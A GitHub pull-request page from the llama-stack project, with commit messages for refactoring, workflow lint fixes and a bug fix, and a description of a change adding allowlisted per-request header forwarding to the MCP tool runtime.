Test plan - [x] `npx markdownlint-cli '**/*.md'` reports zero violations - [x] `uv run pre-commit run --all-files` passes (including codegen convergence hooks) - [x] Distribution template codegen (`distro_codegen.py`) produces identical output on repeated runs --------- Signed-off-by: Eoin Fennessy <efenness@redhat.com> Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> Co-authored-by: mergify[bot] <37929162+mergify[bot]@users.noreply.github.com>
f04296b to
1884f72
Compare
## Summary Remove the `starter-gpu` distribution which is functionally identical to `starter`. The only difference was the `post_training` provider (`inline::huggingface-gpu` vs `inline::torchtune-cpu`), but the fine-tuning/post-training API is no longer supported. All other providers, configs, and build specs were identical. No external references to `starter-gpu` exist anywhere in the codebase — CI workflows, docs, tests, and scripts all only reference `starter`. ## Test plan - [x] `distro_codegen.py` runs clean without starter-gpu - [x] `provider_codegen.py` runs clean - [x] Unit tests pass - [x] No references to `starter-gpu` remain in CI, docs, or tests 🤖 Generated with [Claude Code](https://claude.com/claude-code) Signed-off-by: Sébastien Han <seb@redhat.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
1884f72 to
fff9fb0
Compare
## Summary **Breaking change** — renames the internal `agents` API to `responses` to better reflect its purpose: it implements the OpenAI Responses API. ### Changes - `Api.agents` → `Api.responses` (enum value) - Provider directory: `providers/inline/agents/` → `providers/inline/responses/` - Provider registry: `registry/agents.py` → `registry/responses.py` - API module: `llama_stack_api/agents/` → `llama_stack_api/responses/` - Classes: `BuiltinAgentsImpl` → `BuiltinResponsesImpl` - Config sections: `agents:` → `responses:` in all distribution YAMLs - File: `agents.py` → `impl.py` (avoids collision with `responses/` subpackage) ### Breaking for - User config files with `agents:` provider section → must change to `responses:` - Code using `Api.agents` → must use `Api.responses` - Imports from `llama_stack_api.agents` → must use `llama_stack_api.responses` ### Migration Could add deprecated aliases to soften the transition — looking for feedback on approach. ## Test plan - [x] 217 unit tests pass - [ ] CI passes 🤖 Generated with [Claude Code](https://claude.com/claude-code) --------- Signed-off-by: Sébastien Han <seb@redhat.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
fff9fb0 to
7a6fc8d
Compare
Replace weak thread-alive check with actual port connectivity test to prevent connection refused errors in docker mode integration tests. -- Testing is this is the cause of flakes Signed-off-by: Derek Higgins <derekh@redhat.com>
7a6fc8d to
179042a
Compare
…ssing keys (llamastack#5289) All other KVStore backends (SQLite, Redis, MongoDB, Postgres) silently ignore deletes on non-existent keys, this is the standard behavior of `DELETE` in SQL, `delete_one` in MongoDB, and `DEL` in Redis. The in-memory implementation was the only one that raised `KeyError`, breaking the implicit API contract and causing code that works with production backends to fail when switched to the in-memory store for testing. The fix is change `InmemoryKVStoreImpl.delete()` to use `self._store.pop(key, None)` instead of `del self._store[key]`, so deleting a non-existent key is a silent no-op rather than raising `KeyError`. # What does this PR do? <!-- Provide a short summary of what this PR does and why. Link to relevant issues if applicable. --> <!-- If resolving an issue, uncomment and update the line below --> <!-- Closes #[issue-number] --> ## Test Plan <!-- Describe the tests you ran to verify your changes with result summaries. *Provide clear instructions so the plan can be easily re-executed.* --> <!-- For API changes, include: 1. A testing script (Python, curl, etc.) that exercises the new/modified endpoints 2. The output from running your script Example: ```python ... ... ``` Output: ``` <paste actual output here> ``` --> Co-authored-by: mergify[bot] <37929162+mergify[bot]@users.noreply.github.com>
179042a to
7f6d945
Compare
# What does this PR do? Splits 5 Python files that exceeded 1000 lines into smaller, focused modules. Pure refactoring with no behavior changes. All public names remain importable from the same paths. | Original file | Lines | Split into | |---|---|---| | `src/llama_stack/models/llama/sku_list.py` | 1029 → 915 | `sku_list_download.py` (128L) | | `scripts/openapi_generator/schema_transforms.py` | 1062 → 871 | `_schema_output.py` (217L) | | `tests/unit/.../vertexai/test_adapter.py` | 1578 | `test_adapter_core.py` (365L), `test_adapter_chat.py` (651L), `test_adapter_params.py` (477L) | | `tests/unit/.../vertexai/test_converters.py` | 1368 | `test_converters_requests.py` (724L), `test_converters_responses.py` (613L), `test_converters_completions.py` (330L) | | `tests/unit/.../vector_io/test_vector_io_openai_vector_stores.py` | 1571 | `test_vector_io_stores_index.py` (422L), `..._files.py` (215L), `..._batches.py` (702L), `..._config.py` (385L) | ## Test Plan ~~~bash # vertexai adapter tests (96 pass) uv run pytest tests/unit/providers/inference/vertexai/test_adapter_core.py \ tests/unit/providers/inference/vertexai/test_adapter_chat.py \ tests/unit/providers/inference/vertexai/test_adapter_params.py -v # vertexai converter tests (118 pass) uv run pytest tests/unit/providers/inference/vertexai/test_converters_requests.py \ tests/unit/providers/inference/vertexai/test_converters_responses.py \ tests/unit/providers/inference/vertexai/test_converters_completions.py -v # vector_io tests (92 pass) uv run pytest tests/unit/providers/vector_io/test_vector_io_stores_index.py \ tests/unit/providers/vector_io/test_vector_io_stores_files.py \ tests/unit/providers/vector_io/test_vector_io_stores_batches.py \ tests/unit/providers/vector_io/test_vector_io_stores_config.py -v # import verification uv run python -c "from llama_stack.models.llama.sku_list import resolve_model, all_registered_models; print(len(all_registered_models()), 'models')" uv run python -c "from scripts.openapi_generator import schema_transforms; assert hasattr(schema_transforms, '_write_yaml_file')" ~~~ No breaking changes. All public imports preserved via re-exports. --------- Signed-off-by: Sumanth Kamenani <skamenan@redhat.com> Signed-off-by: skamenan7 <skamenan@redhat.com> Signed-off-by: Sébastien Han <seb@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
7f6d945 to
7876559
Compare
…ck#5284) The default host was incorrectly set to a list ["::", "0.0.0.0"] which caused uvicorn to crash with workers > 1. Uvicorn expects the host parameter to be a string, not a list. Changed the default host to "::" which enables dual-stack binding on modern Linux systems, accepting both IPv4 and IPv6 connections. Added error handling for IPv4-only systems with a helpful message directing users to set server.host: "0.0.0.0" in their config. Fixes: llamastack#5283 Signed-off-by: Derek Higgins <derekh@redhat.com> Co-authored-by: Sébastien Han <seb@redhat.com>
7876559 to
fde93fc
Compare
## Summary
- Add actionlint as a pre-commit hook to lint GitHub Actions workflows
(runs via existing pre-commit CI workflow)
- Fix all actionlint and shellcheck violations across 16 workflow files,
including:
- Untrusted input injection risks (pass `github.event.*` through `env:`
instead of inline `${{ }}`)
- Always-true `if:` condition from redundant `${{ }}` wrapper
- Unquoted variables and command substitutions (SC2086, SC2046)
- `ls` replaced with `find` for robustness (SC2012)
- Grouped consecutive redirects (SC2129)
- Removed unused variables (SC2034)
- Replaced `sed` with parameter expansion where equivalent (SC2001)
- Fixed string vs integer comparison (SC2170)
## Approach
Each lint rule is enabled in a separate commit for easier review — first
commit disables all failing checks, then each subsequent commit enables
one rule and fixes all its violations.
## Test plan
- [x] `uv run pre-commit run actionlint --all-files` passes with zero
violations
- [ ] CI workflows behave identically (all changes are style/safety
fixes with no behavioral changes)
---------
Signed-off-by: Eoin Fennessy <efenness@redhat.com>
Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
Co-authored-by: Sébastien Han <seb@redhat.com>
fde93fc to
cd9ac53
Compare
Adds
forward_headersandextra_blocked_headerstoMCPProviderConfig, wiring per-request header forwarding intolist_runtime_toolsandinvoke_tool. This lets deployers map keys fromX-LlamaStack-Provider-Datato outbound HTTP headers so request-scoped auth tokens (MaaS API keys, tenant IDs, etc.) reach the downstream MCP server without the caller passing them viaauthorization=on every tool call.Follows the same
forward_headerspattern introduced for inference and safety passthrough in llamastack#5134. Authorization-mapped values are split out and passed via theauthorization=param —prepare_mcp_headers()rejectsAuthorizationin the headers dict directly, so it flows through the dedicated param instead.What changed
MCPProviderConfig: addedforward_headers: dict[str, str] | Noneandextra_blocked_headers: list[str]with config-time validation viavalidate_forward_headers_config()fromproviders/utils/forward_headers.pyMCPProviderDataValidator: addedmodel_config = ConfigDict(extra="allow")so deployer-defined keys survive Pydantic parsing (key names are operator-configured at deploy time and can't be declared as typed fields)ModelContextProtocolImpl: new_get_forwarded_headers_and_auth()reads the allowlist from provider data, splits Authorization for theauthorization=param, returns non-auth headers separately. Bothlist_runtime_toolsandinvoke_toolmerge forwarded headers with the legacymcp_headersURI-keyed path (kept for backward compat). Explicitauthorization=from the caller wins over forwarded auth.Config example:
Test plan
Unit/integration tests — tests covering config validation, header forwarding, auth splitting, default-deny enforcement, missing-key soft-skip, and wiring through
list_runtime_toolsandinvoke_tool:Local testing with mock MCP server — ran a mock MCP server that captures all inbound headers and exposes them at
/debug/last-headers. Started llama-stack with theforward_headersconfig above, then verified via the agent API that:maas_api_tokenfromX-LlamaStack-Provider-Dataarrived asAuthorization: Bearer <token>on the downstream servertenant_idarrived asX-Tenant-IDsecret_internal) did not appear in any downstream header (default-deny confirmed)Note:
invoke_toolandlist_runtime_toolsare internal methods called by the agents layer and not exposed as HTTP endpoints (changed in upstream PRs llamastack#4997 and llamastack#5246), so full e2e requires a model server via the agent API.Checklist
forward_headers/extra_blocked_headersoptional with backward-compatible defaults — configs without them parse correctlyNone, empty dict, populated dictMCPProviderDataValidatorusesextra="allow"(intentional — deployer key names can't be pre-declared)MCPProviderConfigusesextra="forbid"build_forwarded_headers()andvalidate_forward_headers_config()fromproviders/utils/forward_headers.py— no duplicationmcp_headersURI-keyed path preserved for backward compatSummary by Sourcery
Add configurable per-request header forwarding support to remote passthrough providers, including MCP tool runtime, inference, and safety, using a shared forward_headers utility with stricter validation and default-deny behavior.
New Features:
Enhancements:
Tests: